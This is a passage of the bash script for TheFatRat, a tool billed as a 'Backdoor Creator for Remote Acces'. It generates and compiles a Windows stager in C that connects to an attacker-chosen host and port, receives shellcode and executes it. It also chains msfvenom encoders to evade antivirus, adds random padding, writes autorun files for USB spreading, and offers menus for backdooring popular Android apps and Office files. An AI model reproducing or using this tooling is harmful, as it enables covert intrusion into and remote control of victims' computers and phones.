read -p ' Set LPORT: ' yourport
fi
echo ""
echo -ne $okegreen " Please enter the base name for output files :" ;tput sgr0
read fira
spinlong
echo ""
echo ""
gboor
spinlong
echo ""
echo '#include <stdio.h>'> $stag
echo '#include <stdlib.h>' >> $stag
echo '#include <winsock2.h>' >> $stag
echo '#include <windows.h>' >> $stag
echo -n 'unsigned char server[]="' >> $stag
echo -n $yourip >> $stag
echo -n '";' >> $stag
echo '' >> $stag
echo -n 'unsigned char serverp[]="' >> $stag
echo -n $yourport >> $stag
echo -n '";' >> $stag
echo '' >> $stag
echo 'void winsock_init() {' >> $stag
echo ' WSADATA wsaData;' >> $stag
echo ' WORD wVersionRequested;' >> $stag
echo ' wVersionRequested = MAKEWORD(2, 2);'>> $stag
echo ' if (WSAStartup(wVersionRequested, &wsaData) < 0) {' >> $stag
echo ' printf("ws2_32.dll is out of date.\n"); '>> $stag
echo ' WSACleanup(); '>> $stag
echo ' exit(1);'>> $stag
echo ' }' >> $stag
echo ' }' >> $stag
echo ' void punt(SOCKET my_socket, char * error) {' >> $stag
echo ' printf("Bad things: %s\n", error);'>> $stag
echo ' closesocket(my_socket);'>> $stag
echo ' WSACleanup();'>> $stag
echo ' exit(1);' >> $stag
echo ' }' >> $stag
echo ' int recv_all(SOCKET my_socket, void * buffer, int len) {' >> $stag
echo ' int tret = 0;'>> $stag
echo ' int nret = 0;'>>$stag
echo ' void * startb = buffer;'>> $stag
echo ' while (tret < len) {'>>$stag
echo ' nret = recv(my_socket, (char *)startb, len - tret, 0);'>> $stag
echo ' startb += nret;'>> $stag
echo ' tret += nret;'>>$stag
echo ' if (nret == SOCKET_ERROR)'>> $stag
echo ' punt(my_socket, "Could not receive data");'>> $stag
echo ' }'>>$stag
echo ' return tret;'>> $stag
echo '}' >> $stag
echo 'SOCKET wsconnect(char * targetip, int port) {'>> $stag
echo ' struct hostent * target;' >> $stag
echo ' struct sockaddr_in sock;' >> $stag
echo ' SOCKET my_socket;'>>$stag
echo ' my_socket = socket(AF_INET, SOCK_STREAM, 0);'>> $stag
echo ' if (my_socket == INVALID_SOCKET)'>> $stag
echo ' punt(my_socket, ".");'>>$stag
echo ' target = gethostbyname(targetip);'>>$stag
echo ' if (target == NULL)'>>$stag
echo ' punt(my_socket, "..");'>>$stag
echo ' memcpy(&sock.sin_addr.s_addr, target->h_addr, target->h_length);'>>$stag
echo ' sock.sin_family = AF_INET;'>> $stag
echo ' sock.sin_port = htons(port);'>>$stag
echo ' if ( connect(my_socket, (struct sockaddr *)&sock, sizeof(sock)) )'>>$stag
echo ' punt(my_socket, "...");'>>$stag
echo ' return my_socket;'>>$stag
echo '}' >> $stag
echo 'int main(int argc, char * argv[]) {' >> $stag
echo ' FreeConsole();'>>$stag
echo ' ULONG32 size;'>>$stag
echo ' char * buffer;'>>$stag
echo ' void (*function)();'>>$stag
echo ' winsock_init();'>> $stag
echo ' SOCKET my_socket = wsconnect(server, atoi(serverp));'>>$stag
echo ' int count = recv(my_socket, (char *)&size, 4, 0);'>>$stag
echo ' if (count != 4 || size <= 0)'>>$stag
echo ' punt(my_socket, "read a strange or incomplete length value\n");'>>$stag
echo ' buffer = VirtualAlloc(0, size + 5, MEM_COMMIT, PAGE_EXECUTE_READWRITE);'>>$stag
echo ' if (buffer == NULL)'>>$stag
echo ' punt(my_socket, "could not allocate buffer\n");'>>$stag
echo ' buffer[0] = 0xBF;'>>$stag
echo ' memcpy(buffer + 1, &my_socket, 4);'>>$stag
echo ' count = recv_all(my_socket, buffer + 5, size);'>>$stag
echo ' function = (void (*)())buffer;'>>$stag
echo ' function();'>>$stag
echo ' return 0;'>>$stag
echo '}' >> $stag
$COMPILER $stag -o output/$fira.exe -lws2_32
echo
echo -e $yellow " [+]"$okegreen"Compiling Binary Done ";tput sgr0
rm $stag
echo -ne $yellow " Press Enter key to Contiune ..."
read aw
PwnWinds
elif test $fatrat1 == '8'
then
clear
menu
else
echo -e " Incorrect Number"
fi
echo ""
echo -n -e $yellow " Do you want exit? ( Yes / No ) : "
read back
if [ $back != 'n' ] && [ $back != 'N' ]
then
clear
exit
elif [ $back != 'y' ] && [ $back != 'Y' ]
then
PwnWinds
fi
}
########################################### MENU AVOID ############################################################
#
#recoded AVOID ( AV0id - Metapsloit Payload Anti-Virus Evasion ) to next version - Screetsec ( Edo -maland )
#Released as open source by NCC Group Plc - http://www.nccgroup.com/
#Developed or original code by Daniel Compton, daniel dot compton at nccgroup dot com
#Removed Deprecated Commands in favor of MsfVenom by Jason Soto www.jsitech.com
#Credit to other A.V. scripts and research by Astr0baby, Vanish3r & Hasan aka inf0g33k , Screetsec
#
################################################################################################################
function avoid {
clear
# User options
PAYLOAD="windows/meterpreter/reverse_tcp" # The payload to use
MSFVENOM="$msfvenom" # Path to the msfvenom script
MSFCONSOLE="$msfconsole" # Path to the msfconsole script
#Checking
[[ `id -u` -eq 0 ]] || { echo -e "\e[31mMust be root to run script"; exit 1; }
resize -s 36 73 > /dev/null
clear
SERVICE=service;
#Checking Version
VERSION="2.1"
# spinner for Metasploit Generator
spinlong ()
{
bar=" +++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++ "
barlength=${#bar}
i=0
while ((i < 100)); do
n=$((i*barlength / 100))
printf "\e[00;32m\r[%-${barlength}s]\e[00m" "${bar:0:n}"
((i += RANDOM%5+2))
sleep 0.02
done
}
# spinner for random seed generator
spinlong2 ()
{
bar=" 01100111001001001110111001101010101010110101001010111001010101010101010"
barlength=${#bar}
i=0
while ((i < 100)); do
n=$((i*barlength / 100))
printf "\e[00;32m\r[%-${barlength}s]\e[00m" "${bar:0:n}"
((i += RANDOM%5+2))
sleep 0.02
done
}
clear
#MENU INTI
echo ""
echo -e $cyan"========================================================================"
echo -e $okegreen" METASPLOIT SHELL A.V. FOR BYPASS AV THIS VERSION $VERSION "
echo -e $cyan"========================================================================"
echo -e $red""
echo " "
echo " ..:::::::::.. "
echo " ..:::aad8888888baa:::.. "
echo " .::::d:?88888888888?::8b::::. "
echo " .:::d8888:?88888888??a888888b:::. "
echo " .:::d8888888a8888888aa8888888888b:::. "
echo " ::::dP::::::::88888888888::::::::Yb:::: "
echo " ::::dP:::::::::Y888888888P:::::::::Yb:::: "
echo " ::::d8:::::::::::Y8888888P:::::::::::8b:::: "
echo " .::::88::::::::::::Y88888P::::::::::::88::::. "
echo " :::::Y8baaaaaaaaaa88P:T:Y88aaaaaaaaaad8P::::: "
echo " :::::::Y88888888888P::|::Y88888888888P::::::: "
echo " ::::::::::::::::888:::|:::888:::::::::::::::: "
echo " :::::::::::::::8888888888888b:::::::::::::: "
echo " :::::::::::::::88888888888888:::::::::::::: "
echo " :::::::::::::d88888888888888::::::::::::: "
echo " ::::::::::::88::88::88:::88:::::::::::: "
echo " ::::::::::88::88::88:::88:::::::::: "
echo " ::::::::88::88::P::::88:::::::: "
echo " ::::::88::88:::::::88:::::: "
echo " ::::::::::::::::::: "
echo " ::::::::: "
echo ""
echo -e -$cyan " REMAKE:$red "Screetsec" $cyan( Edo -maland- ) "
echo -e " OPEN SOURCE : $red "NCC Group Plc" $cyan( http://www.nccgroup.com ) "
echo -e " DEVELOPED : $red Daniel Compton, daniel dot compton at nccgroup dot com "
echo -e $cyan"========================================================================"
echo -e $okegreen" METASPLOIT SHELL A.V. FOR BYPASS AV THIS VERSION $VERSION "
echo -e $cyan"========================================================================"
echo -e $cyan""
# Set Output filename
echo
echo -n -e "TYPE THE DESIRED OUTPUT FILENAME : $okegreen" ;
read OUTPUTNAME
echo ""
echo ""
echo -n -e $cyan"TYPE THE DESIRED LABEL FOR THE AUTORUN FILES : $okegreen" ;
read LABEL
echo ""
#Check for Metasploit
if [[ "$MSFVENOM" != "" || "$MSFCONSOLE" != "" ]]; then
echo ""
else
echo ""
echo -e "\e[01;31m[!]\e[00m Unable to find the required Metasploit program, cant continue. Install and try again"
echo -e "\e[01;31m[!]\e[00m If msfpayload, msfencode and msfcli are not in your PATH, edit this script options"
echo ""
exit 1
fi
# Random Msfencode encoding iterations
#ITER=`seq 5 10 |sort -R |sort -R | head -1`
ITER=`shuf -i 10-20 -n 1`
echo -e $okegreen""
echo -e $yellow "Your local IP address is : $lanip"
echo -e $yellow "Your public IP address is : $publicip"
echo -e $yellow "Your Hostname is : $hostn"
if [ ! -f "$defcon" ]
then
yourip=""
yourport=""
fi
echo -e $okegreen""
if [ -z "$yourip" ]; then
read -p ' Set LHOST IP: ' yourip
fi
echo -e $okegreen ""
if [ -z "$yourport" ]; then
read -p ' Set LPORT: ' yourport
fi
echo ""
echo ""
echo ""
echo -e "\e[01;32m[-]\e[00m Generating Metasploit payload, please wait..."
echo ""
echo ""
spinlong
#Payload creater
$MSFVENOM -p "$PAYLOAD" LHOST="$yourip" LPORT="$yourport" EXITFUNC=thread -f raw | $MSFVENOM -e x86/shikata_ga_nai -i $ITER -f raw 2>/dev/null | $MSFVENOM -e x86/jmp_call_additive -i $ITER -a x86 --platform linux -f raw 2>/dev/null | $MSFVENOM -e x86/call4_dword_xor -i $ITER -a x86 --platform win -f raw 2>/dev/null | $MSFVENOM -e x86/shikata_ga_nai -i $ITER -a x86 --platform win -f c > msf.c 2>/dev/null
echo ""
echo ""
# ANOTHER MENU
clear
echo " "
echo -e $cyan"=================================================================="
echo -e $okegreen" __ _ _ __ "
echo " / _|_ _ ___| | ___ _ ___ _ _ _ __ ___ ___| |/ _| "
echo " | |_| | | |/ __| |/ / | | |/ _ \| | | | '__/ __|/ _ \ | |_ "
echo " | _| |_| | (__| <| |_| | (_) | |_| | | \__ \ __/ | _| "
echo " |_| \____|\___|_|\_\\___ |\___/ \____|_| |___/\___|_|_| "
echo " |___/ "
echo -e $cyan"=================================================================="
echo -e $red""
echo -e $okegreen" |||||||||||||| "
echo -e $red" = \ "
echo " = | "
echo " _= ___/ "
echo -e " / _\ ($okegreen"o"$red)\ "
echo " | | \ _ \ "
echo " | |/ (____) "
echo " \__/ / | "
echo " / / ___) "
echo -e " / \ \ _) $okegreen ) "
echo -e $red" \ \ / $okegreen TheFatRat $okegreen ( "
echo -e $red" \/ \ \_________/ |\___________________ $okegreen ) "
echo -e $red" \/ \ / | $okegreen"===="$red _______)__) "
echo -e " \/ \ / __/___ $okegreen"===="$red _/ "
echo -e " \/ \ / ($okegreen"O"$red ____)\\_(_/ "
echo -e " ($okegreen"O"$red _ ____) "
echo -e " ($okegreen"O"$red ____) "
echo ""
echo -e $cyan"================================================================= "
echo ""
echo -e $okegreen""
echo " 1. Normal [ 400K payload ] - [ fast compile ] "
echo ""
echo " 2. Stealth [ 1-2 MB payload ] - [ fast compile ] "
echo ""
echo " 3. Super Stealth - [ 10-20MB payload ] "
echo ""
echo " 4. Insane Stealth - [ 50MB payload ] "
echo ""
echo " 5. Desperate Stealth - [ 100MB payload ] "
echo ""
echo -ne $cyan "TYPE THE NUMBER IF YOU WANT : " ;
read LEVEL
echo ""
if [ "$LEVEL" = "1" ]; then
echo ""
echo -e "\e[01;32m[-]\e[00m Normal selected, please wait a few seconds"
echo ""
echo -e "\e[01;32m[-]\e[00m Generating random seed for padding...please wait"
echo ""
spinlong2
SEED=$(shuf -i 100000-500000 -n 1)
elif [ "$LEVEL" = "2" ]; then
echo ""
echo -e "\e[01;32m[-]\e[00m Stealth selected, please wait a few seconds"
echo ""
echo -e "\e[01;32m[-]\e[00m Generating random seed for padding...please wait"
echo ""
spinlong2
SEED=$(shuf -i 1000000-5000000 -n 1)
elif [ "$LEVEL" = "3" ]; then
echo ""
echo -e "\e[01;32m[-]\e[00m Super Stealth selected, please wait a few seconds"
echo ""
echo -e "\e[01;32m[-]\e[00m Generating random seed for padding...please wait"
echo ""
spinlong2
SEED=$(shuf -i 8000000-12000000 -n 1)
elif [ "$LEVEL" = "4" ]; then
echo ""
echo -e "\e[01;32m[-]\e[00m Insane Stealth selected, please wait a few minutes"
echo ""
echo -e "\e[01;32m[-]\e[00m Generating random seed for padding...please wait"
echo ""
spinlong2
SEED=$(shuf -i 40000000-60000000 -n 1)
elif [ "$LEVEL" = "5" ]; then
echo ""
echo -e "\e[01;32m[-]\e[00m Desperate Stealth selected, please wait a few minutes"
echo ""
echo -e "\e[01;32m[-]\e[00m Generating random seed for padding...please wait"
echo ""
spinlong2
SEED=$(shuf -i 100000000-200000000 -n 1)
else
echo -e "\e[01;31m[!]\e[00m You didnt select a option, exiting"
echo ""
exit 1
fi
# build the c file ready for compile
echo ""
echo '#include <stdio.h>' >> build.c
echo 'unsigned char padding[]=' >> build.c
cat /dev/urandom | tr -dc _A-Z-a-z-0-9 | head -c$SEED > random
sed -i 's/$/"/' random
sed -i 's/^/"/' random
cat random >> build.c
echo ';' >> build.c
echo 'char payload[] =' >> build.c
cat msf.c |grep -v "unsigned" >> build.c
echo 'char comment[512] = "";' >> build.c
echo 'int main(int argc, char **argv) {' >> build.c
echo ' (*(void (*)()) payload)();' >> build.c
echo ' return(0);' >> build.c
echo '}' >> build.c
# gcc compile the exploit
ls icons/icon.res >/dev/null 2>&1
if [ $? -eq 0 ]; then
$COMPILER -Wall -mwindows icons/icon.res build.c -o "$OUTPUTNAME"
else
$COMPILER -Wall -mwindows build.c -o "$OUTPUTNAME"
fi
# check if file built correctly
LOCATED=`pwd`
ls "$OUTPUTNAME" >/dev/null 2>&1
if [ $? -eq 0 ]; then
echo ""
echo -e "\e[01;32m[+]\e[00m Your payload has been successfully created and is located here: \e[01;32m"$LOCATED"/"$OUTPUTNAME"\e[00m"
else
echo ""
echo -e "\e[01;31m[!]\e[00m Something went wrong trying to compile the executable, exiting"
echo ""
exit 1
fi
# create autorun files
mkdir autorun >/dev/null 2>&1
cp "$OUTPUTNAME" autorun/ >/dev/null 2>&1
cp icons/autorun.ico autorun/ >/dev/null 2>&1
echo "[autorun]" > autorun/autorun.inf
echo "open="$OUTPUTNAME"" >> autorun/autorun.inf
echo "icon=autorun.ico" >> autorun/autorun.inf
echo "label="$LABEL"" >> autorun/autorun.inf
echo ""
echo -e "\e[01;32m[+]\e[00m I have also created 3 AutoRun files here: \e[01;32m"$LOCATED"/"autorun/"\e[00m - simply copy these files to a CD or USB"
# clean up temp files
rm build.c >/dev/null 2>&1
rm random >/dev/null 2>&1
rm msf.c >/dev/null 2>&1
rm msfhandler.rc >/dev/null 2>&1
echo -n -e $okegreen"Do you want exit? ( Yes / No ) : "
read back
if [ $back != 'n' ] && [ $back != 'N' ]
then
clear
exit
elif [ $back != 'y' ] && [ $back != 'Y' ]
then
menu
fi
}
#### credits
function credits {
clear
echo -e "
\033[31m##########################################################################\033[m
Credits To
\033[31m##########################################################################\033[m"
echo
echo -e $white "Special thanks to:"
echo
echo -e $red "Dracos Linux ( www.dracos-linux.org )"
echo
echo -e $red "Offensive Security for the awesome OS"
echo
echo -e $green "http://www.offensive-security.com/"
echo
echo -e $yellow "http://www.kali.org/"
echo
echo -e $cyan "http://www.kitploit.com/"
echo
echo -e $white "http://www.linuxsec.org/"
echo
echo -e $red "Big Thanks to : http://www.github.com/"
echo
}
###################################################################
# MENU FATRAT
###################################################################
menu () {
clear
resize -s 46 76 > /dev/null
echo -e $okegreen""
echo -e $okegreen" ____ "
echo -e $okegreen" | | "
echo -e $okegreen" |____| "
echo -e $okegreen" _|____|_ $okegreen _____ _ _____ _ _____ _ "
echo -e $okegreen" / $white"ee"\_ $okegreen|_ _| |_ ___| __|___| |_| __ |___| |_ "
echo -e $okegreen" .< __O $okegreen | | | | -_| __| .'| _| -| .'| _| "
echo -e $okegreen" /\ \.-.' \ $okegreen |_| |_|_|___|__| |___|_| |__|__|___|_| "
echo -e $okegreen" J \.|'.\/ \ "
echo -e $okegreen" | |_.|. | | | $white"[$okegreen--$white] $cyan " $white"Backdoor" Creator for Remote Acces $white[$okegreen--$white] "
echo -e $okegreen" \__.' .|-' / $white"[$okegreen--$white] $cyan" Created by: "$red"Edo Maland (Screetsec) $white[$okegreen--$white] "
echo -e $okegreen" L /|o'--'\ $white"[$okegreen--$white] $cyan" Version: $red"$Versi" $white[$okegreen--$white] "
echo -e $okegreen" | /\/\/\ \ $white"[$okegreen--$white] $cyan" Codename: $red"$codename" $white[$okegreen--$white] "
echo -e $okegreen" J / \.__\ $white"[$okegreen--$white] $cyan" Follow me on Github: $red@Screetsec $white[$okegreen--$white] "
echo -e $okegreen" J / \.__\ $white"[$okegreen--$white] $cyan" Dracos Linux : $red@dracos-linux.org $white[$okegreen--$white] "
echo -e $okegreen" |/ / $white"[$okegreen--$white] $cyan" $white[$okegreen--$white] "
echo -e $okegreen" \ .'\. $white"[$okegreen--$white]$white " SELECT AN OPTION TO BEGIN: $white[$okegreen--$white] "
echo -e $okegreen" ____)_/\_(___\. $white"[$okegreen--$white] ".___________________________________$white[$okegreen--$white] "
echo -e $okegreen" (___._/ \_.___)'$white\_.-----------------------------------------/ "
echo
echo -e $white " "
echo -e $white" [$okegreen"01"$white]$okegreen Create Backdoor with msfvenom"
echo -e $white" [$okegreen"02"$white]$okegreen Create Fud 100% Backdoor [Slow but Powerfull] "
echo -e $white" [$okegreen"03"$white]$okegreen Create Fud Backdoor with Avoid v1.2 "
echo -e $white" [$okegreen"04"$white]$okegreen Create Fud Backdoor with backdoor-factory [embed] "
echo -e $white" [$okegreen"05"$white]$okegreen Backdooring Original apk [Instagram, Line,etc] "
echo -e $white" [$okegreen"06"$white]$okegreen Create Fud Backdoor 1000% with PwnWinds [Excelent] "
echo -e $white" [$okegreen"07"$white]$okegreen Create Backdoor For Office with Microsploit "
echo -e $white" [$okegreen"08"$white]$okegreen Create auto listeners "
echo -e $white" [$okegreen"09"$white]$okegreen Jump to msfconsole "
echo -e $white" [$okegreen"10"$white]$okegreen Searchsploit "
echo -e $white" [$okegreen"11"$white]$okegreen File Pumper [Increase Your Files Size] "
echo -e $white" [$okegreen"12"$white]$okegreen Configure Default Lhost & Lport "
echo -e $white" [$okegreen"13"$white]$okegreen Cleanup "
echo -e $white" [$okegreen"14"$white]$okegreen Help "
echo -e $white" [$okegreen"15"$white]$okegreen Credits "
echo -e $white" [$okegreen"16"$white]$okegreen Exit "
echo -e " "
echo -e $okegreen" ┌─["$red"TheFatRat$okegreen]──[$red~$okegreen]─["$yellow"menu$okegreen]:"
echo -ne $okegreen" └─────► " ;tput sgr0
read fatrat
if test $fatrat == '1'
then
cmsfvenom
elif test $fatrat == '2'
then
chmod +x powerfull.sh
xterm -fa monaco -fs 13 -bg black ./powerfull.sh
elif test $fatrat == '3'
then
avoid
elif test $fatrat == '4'
then
echo ""
spinlong
echo -e $okegreen""
echo -e $yellow " Your local IP address is : $lanip"
echo -e $yellow " Your public IP address is : $publicip"
echo -e $yellow " Your Hostname is : $hostn"
echo -e $okegreen""
read -p ' Set LHOST IP: ' yourip; read -p ' Set LPORT: ' yourport; read -p ' Please enter the base name for output files : ' fira;
embed=$(zenity --file-selection --file-filter='EXE files (exe) | *.exe' --title="Select your executable file");
payload=$(zenity --list --title "☣ TheFatRat ☣" --text "\nAvailable Payloads:" --radiolist --column "Pick" --column "Option" TRUE "cave_miner_inline" FALSE "iat_reverse_tcp_inline" FALSE "iat_reverse_tcp_inline_threaded" FALSE "iat_reverse_tcp_stager_threaded" FALSE "iat_user_supplied_shellcode_threaded" FALSE "meterpreter_reverse_https_threaded" FALSE "reverse_shell_tcp_inline" FALSE "reverse_tcp_stager_threaded" FALSE "user_supplied_shellcode_threaded" --width 350 --height 300) > /dev/null 2>&1
spinlong
if [ ! -f "$embed" ];then
echo -e $red "You did not setected any executable file"
read -ne " Press any key to return to menu ."
menu
fi
echo ""
echo ""
gboor
spinlong2
echo ""
echo -e $okegreen""
$backdoor -f $embed -s $payload -H $yourip -P $yourport -o output/$fira.exe
echo -e "Shell Saved To :($path/backdoored/output/$fira.exe) press any key to continue"
read bebeku
clear
menu
elif test $fatrat == '5'
then
embedapk
elif test $fatrat == '6'
then
PwnWinds
elif test $fatrat == '7'
then
microsploit
elif test $fatrat == '8'
then
clisteners
elif test $fatrat == '9'
then
xterm -fa monaco -fs 13 -bg black -e "$msfconsole"
elif test $fatrat == '10'
then
clear
echo -e "\033[31mWhat do you want to Hack Today?\033[m"
echo -e "\033[31mEnter a search term and hit Enter\033[m"
read searchterm
gnome-terminal --maximize -t "Seachsploit" --working-directory=WORK_DIR -x bash -c "$searchsploit $searchterm; echo -e '\e[32m[-] Close this window when done!\e[0m'; bash" 2>/dev/null & sleep 2
menu
elif test $fatrat == '11'
then
echo
echo -ne $okegreen " Located file (example:/output/backdoor.apk) :" ;tput sgr0
read tampfile
echo
echo -ne $okegreen" Size file for tamper (1000 for kb) (1 for mb ) : " ;tput sgr0
read size
echo
echo -ne $okegreen" mb or kb : " ;tput sgr0
read type
python $pump $tampfile $size -$type > /dev/null 2>&1
echo
echo -ne $yellow" Finished Pumping ... "
read oke
menu
elif test $fatrat == '12'
then
echo ""
confdefault
clear
menu
elif test $fatrat == '13'
then
echo ""
echo -ne $red" [>] $cyan Are you sure you want to clean payload folders? [y/N] : "
read clean
if [ $clean == "y" ] ;
then
echo ""
else
clear
exit
fi
echo -e $red" [*] $cyan Cleaning /TheFatRat/temp/"
cd temp
rm *.rc >/dev/null 2>&1
cd ..
sleep 2
echo ""
echo -e $red" [*] $cyan Cleaning /TheFatRat/autorun/"
cd autorun
rm * >/dev/null 2>&1
cd ..
sleep 2
echo ""
echo -e $red" [*] $cyan Cleaning /TheFatRat/output/"
cd output
rm * >/dev/null 2>&1
cd ..
sleep 2
echo ""
echo -e $red" [*] $cyan Cleaning /TheFatRat/*.exe or apk"
rm *.exe *.apk >/dev/null 2>&1
sleep 2
echo ""
echo -e $red" [*] $cyan Cleaning /TheFatRat/backdoored/output/"
cd backdoored/output
rm * >/dev/null 2>&1
cd ..
cd ..
echo ""
echo -ne $red" [*] $cyan Folders cleaned, press any key to return to the main menu."
read anjeng
menu
elif test $fatrat == '14'
then
firefox https://github.com/Screetsec/TheFatRat/blob/master/README.md
elif test $fatrat == '15'
then
credits
elif test $fatrat == '16'
then
Stop
echo ""
echo -e $okegreen" REMEMBER , DONT UPLOAD TO VIRUSTOTAL !!"
echo ""
read -p " Press [Enter] key to Exit..."
sleep 2
clear
exit
else
echo -e " Incorrect Number"
fi
echo -n -e " Do you want exit? ( Yes / No ) :"
read back
if [ $back != 'n' ] && [ $back != 'N' ]
then
clear
exit
elif [ $back != 'y' ] && [ $back != 'Y' ]
then
menu
fi
}
###################################################################
# MENU FATRAT
###################################################################
clear
resize -s 46 76 > /dev/null
echo -e $okegreen""
echo -e $okegreen" ____ "
echo -e $okegreen" | | "
echo -e $okegreen" |____| "
echo -e $okegreen" _|____|_ $okegreen _____ _ _____ _ _____ _ "
echo -e $okegreen" / $white"ee"\_ $okegreen|_ _| |_ ___| __|___| |_| __ |___| |_ "
echo -e $okegreen" .< __O $okegreen | | | | -_| __| .'| _| -| .'| _| "
echo -e $okegreen" /\ \.-.' \ $okegreen |_| |_|_|___|__| |___|_| |__|__|___|_| "
echo -e $okegreen" J \.|'.\/ \ "
echo -e $okegreen" | |_.|. | | | $white"[$okegreen--$white] $cyan " $white"Backdoor" Creator for Remote Acces $white[$okegreen--$white] "
echo -e $okegreen" \__.' .|-' / $white"[$okegreen--$white] $cyan" Created by: "$red"Edo Maland (Screetsec) $white[$okegreen--$white] "
echo -e $okegreen" L /|o'--'\ $white"[$okegreen--$white] $cyan" Version: $red"$Versi" $white[$okegreen--$white] "
echo -e $okegreen" | /\/\/\ \ $white"[$okegreen--$white] $cyan" Codename: $red"$codename" $white[$okegreen--$white] "
echo -e $okegreen" J / \.__\ $white"[$okegreen--$white] $cyan" Follow me on Github: $red@Screetsec $white[$okegreen--$white] "
echo -e $okegreen" J / \.__\ $white"[$okegreen--$white] $cyan" Dracos Linux : $red@dracos-linux.org $white[$okegreen--$white] "
echo -e $okegreen" |/ / $white"[$okegreen--$white] $cyan" $white[$okegreen--$white] "
echo -e $okegreen" \ .'\. $white"[$okegreen--$white]$white " SELECT AN OPTION TO BEGIN: $white[$okegreen--$white] "
echo -e $okegreen" ____)_/\_(___\. $white"[$okegreen--$white] ".___________________________________$white[$okegreen--$white] "
echo -e $okegreen" (___._/ \_.___)'$white\_.-----------------------------------------/ "
echo
echo -e $white " "
echo -e $white" [$okegreen"01"$white]$okegreen Create Backdoor with msfvenom"
echo -e $white" [$okegreen"02"$white]$okegreen Create Fud 100% Backdoor [Slow but Powerfull] "
echo -e $white" [$okegreen"03"$white]$okegreen Create Fud Backdoor with Avoid v1.2 "
echo -e $white" [$okegreen"04"$white]$okegreen Create Fud Backdoor with backdoor-factory [embed] "
echo -e $white" [$okegreen"05"$white]$okegreen Backdooring Original apk [Instagram, Line,etc] "
echo -e $white" [$okegreen"06"$white]$okegreen Create Fud Backdoor 1000% with PwnWinds [Excelent] "
echo -e $white" [$okegreen"07"$white]$okegreen Create Backdoor For Office with Microsploit "
echo -e $white" [$okegreen"08"$white]$okegreen Create auto listeners "
echo -e $white" [$okegreen"09"$white]$okegreen Jump to msfconsole "
echo -e $white" [$okegreen"10"$white]$okegreen Searchsploit "
echo -e $white" [$okegreen"11"$white]$okegreen File Pumper [Increase Your Files Size] "
echo -e $white" [$okegreen"12"$white]$okegreen Configure Default Lhost & Lport "
echo -e $white" [$okegreen"13"$white]$okegreen Cleanup "
echo -e $white" [$okegreen"14"$white]$okegreen Help "
echo -e $white" [$okegreen"15"$white]$okegreen Credits "
echo -e $white" [$okegreen"16"$white]$okegreen Exit "
echo -e " "
echo -e $okegreen" ┌─["$red"TheFatRat$okegreen]──[$red~$okegreen]─["$yellow"menu$okegreen]:"
echo -ne $okegreen" └─────► " ;tput sgr0
read fatrat
if test $fatrat == '1'
then
cmsfvenom
elif test $fatrat == '2'
then
chmod +x powerfull.sh
xterm -fa monaco -fs 13 -bg black ./powerfull.sh
elif test $fatrat == '3'
then
avoid
elif test $fatrat == '4'
then
echo ""
spinlong
echo -e $okegreen""
echo -e $yellow " Your local IP address is : $lanip"
echo -e $yellow " Your public IP address is : $publicip"
echo -e $yellow " Your Hostname is : $hostn"
echo -e $okegreen""
read -p ' Set LHOST IP: ' yourip; read -p ' Set LPORT: ' yourport; read -p ' Please enter the base name for output files : ' fira;
embed=$(zenity --file-selection --file-filter='EXE files (exe) | *.exe' --title="Select your executable file");
payload=$(zenity --list --title "☣ TheFatRat ☣" --text "\nAvailable Payloads:" --radiolist --column "Pick" --column "Option" TRUE "cave_miner_inline" FALSE "iat_reverse_tcp_inline" FALSE "iat_reverse_tcp_inline_threaded" FALSE "iat_reverse_tcp_stager_threaded" FALSE "iat_user_supplied_shellcode_threaded" FALSE "meterpreter_reverse_https_threaded" FALSE "reverse_shell_tcp_inline" FALSE "reverse_tcp_stager_threaded" FALSE "user_supplied_shellcode_threaded" --width 350 --height 300) > /dev/null 2>&1
spinlong
if [ ! -f "$embed" ];then
echo -e $red "You did not setected any executable file"
read -ne " Press any key to return to menu ."
menu
fi
echo ""
echo ""
gboor
spinlong2
echo ""
echo -e $okegreen""
$backdoor -f $embed -s $payload -H $yourip -P $yourport -o output/$fira.exe
echo -e "Shell Saved To :($path/backdoored/output/$fira.exe) press any key to continue"
read bebeku
clear
menu
elif test $fatrat == '5'
then
embedapk
elif test $fatrat == '6'
then
PwnWinds
elif test $fatrat == '7'
then
microsploit
elif test $fatrat == '8'
then
clisteners
elif test $fatrat == '9'
then
xterm -fa monaco -fs 13 -bg black -e "$msfconsole"
elif test $fatrat == '10'
then
clear
echo -e "\033[31mWhat do you want to Hack Today?\033[m"
echo -e "\033[31mEnter a search term and hit Enter\033[m"
read searchterm
gnome-terminal --maximize -t "Seachsploit" --working-directory=WORK_DIR -x bash -c "$searchsploit $searchterm; echo -e '\e[32m[-] Close this window when done!\e[0m'; bash" 2>/dev/null & sleep 2
menu
elif test $fatrat == '11'
then
echo
echo -ne $okegreen " Located file (example:/output/backdoor.apk) :" ;tput sgr0
read tampfile
echo
echo -ne $okegreen" Size file for tamper (1000 for kb) (1 for mb ) : " ;tput sgr0
read size
echo
echo -ne $okegreen" mb or kb : " ;tput sgr0
read type
python $pump $tampfile $size -$type > /dev/null 2>&1
echo
echo -ne $yellow" Finished Pumping ... "
read oke
menu
elif test $fatrat == '12'
then
echo ""
confdefault
clear
menu
elif test $fatrat == '13'
then
echo ""
echo -ne $red" [>] $cyan Are you sure you want to clean payload folders? [y/N] : "
read clean
if [ $clean == "y" ] ;
then
echo ""
else
clear
exit
fi
echo -e $red" [*] $cyan Cleaning /TheFatRat/temp/"
cd temp
rm *.rc >/dev/null 2>&1
cd ..
sleep 2
echo ""
echo -e $red" [*] $cyan Cleaning /TheFatRat/autorun/"
cd autorun
rm * >/dev/null 2>&1
cd ..
sleep 2
echo ""
echo -e $red" [*] $cyan Cleaning /TheFatRat/output/"
cd output
rm * >/dev/null 2>&1
cd ..
sleep 2
echo ""
echo -e $red" [*] $cyan Cleaning /TheFatRat/*.exe or apk"
rm *.exe *.apk >/dev/null 2>&1
sleep 2
echo ""
echo -e $red" [*] $cyan Cleaning /TheFatRat/backdoored/output/"
cd backdoored/output
rm * >/dev/null 2>&1
cd ..
cd ..
echo ""
echo -ne $red" [*] $cyan Folders cleaned, press any key to return to the main menu."
read anjeng
menu
elif test $fatrat == '14'
then
firefox https://github.com/Screetsec/TheFatRat/blob/master/README.md
elif test $fatrat == '15'
then
credits
elif test $fatrat == '16'
then
Stop
echo ""
echo -e $okegreen" REMEMBER , DONT UPLOAD TO VIRUSTOTAL !!"
echo ""
read -p " Press [Enter] key to Exit..."
sleep 2
clear
exit
else
echo -e " Incorrect Number"
fi
echo -n -e " Do you want exit? ( Yes / No ) :"
read back
if [ $back != 'n' ] && [ $back != 'N' ]
then
clear
exit
